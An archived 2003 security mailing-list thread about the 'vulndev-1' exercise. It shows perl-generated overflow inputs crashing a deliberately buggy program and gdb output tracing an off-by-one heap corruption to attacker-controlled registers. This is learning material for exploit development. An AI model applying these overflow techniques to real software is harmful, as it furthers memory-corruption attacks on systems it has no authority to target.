Hosting Provided By

Re: Administrivia: List Announcement

From: Thiago Canozzo Lahr <tclahr(at)br.ibm.com>
Date: Wed May 14 2003 - 08:00:06 EDT

Folks,

It's very interesting that I run the same program on a Linux and on a AIX box, and only the Linux returns Segmentation fault:

Linux SuSE 7.2 on a S/390 Mainframe
# ./vulndev-1 `perl -e 'print "A"x253;print " ";print "B"x253;'` Segmentation fault (core dumped)
#

AIX 4.3.3 on a RS/6000 Risk
# ./vulndev-1 `perl -e 'print "A"x253;print " ";print "B"x253;'` #

Suggestions?

Obrigado / Regards

/*
 * Thiago Canozzo Lahr .:. IT Security Brazil
 * IBM Global Services .:. Email: tclahr@br.ibm.com
 * T/L: 6839-7091 .:. Phone: +55 19 3887-7091

"Nexus" <nexus@patrol.i-way.co.uk>
13/05/03 18:24

        To:     "xenophi1e" , 
        cc: 
        Subject:        Re: Administrivia: List Announcement

Original Message ----- From: "xenophi1e" <oliver.lavery@sympatico.ca>

[snip]

> Off-by-one. Third arg should be SIZE-1 to leave room for the terminating
> NULL. This error should lead to a heap based vulnerability when the
> memory is free()d.

Do you need help?

To take it one stage further, assuming the sample program is called buggy.c:
(Using linux as debugging on win32 is not email friendly ;-)

[nexus@wulfgar insecure]$ gcc buggy.c -g -o buggy
[nexus@wulfgar insecure]$ ./buggy `perl -e 'print "A"x253;print " ";print
"BBBBCCCC";'`
Segmentation fault (core dumped)

One byte over the buffer size of 252 for the first arg, so we get an exception - looking at what happened:

[nexus@wulfgar insecure]$ gdb buggy core.966
GNU gdb Red Hat Linux (5.2.1-4)
Copyright 2002 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"... Core was generated by `./buggy

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.

Program terminated with signal 11, Segmentation fault. Reading symbols from /lib/i686/libc.so.6...done. Loaded symbols for /lib/i686/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done. Loaded symbols for /lib/ld-linux.so.2
#0 0x42074033 in _int_free () from /lib/i686/libc.so.6

There's the exception in free() as mentioned by xenophi1e, do we have any registers at all ?

(gdb) info reg

eax            0x43434343       1128481603
ecx            0x42424242       1111638594
edx            0x140    320
ebx            0x4212a2d0       1108517584
esp            0xbffff980       0xbffff980
ebp            0xbffff9a8       0xbffff9a8
esi            0x80495f0        134518256
edi            0x100    256
eip            0x42074033       0x42074033

[...]

Yup - the second arg is overwriting eax and ecx on this x86 RH8 system, thus
we can write arbitrary data into 2 registers. What can we do next ?

Cheers. Received on Wed May 14 11:35:45 2003

Do you need more help?

This message: [ Message body ]
Next message: Cameron Brown: "RE: vulndev1.c solution (warning SPOILER)"
Previous message: Marco Ivaldi: "another vulndev-1.c solution"
Maybe in reply to: Dave McKinney: "Administrivia: List Announcement"
In reply to Nexus: "Re: Administrivia: List Announcement"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:39 EDT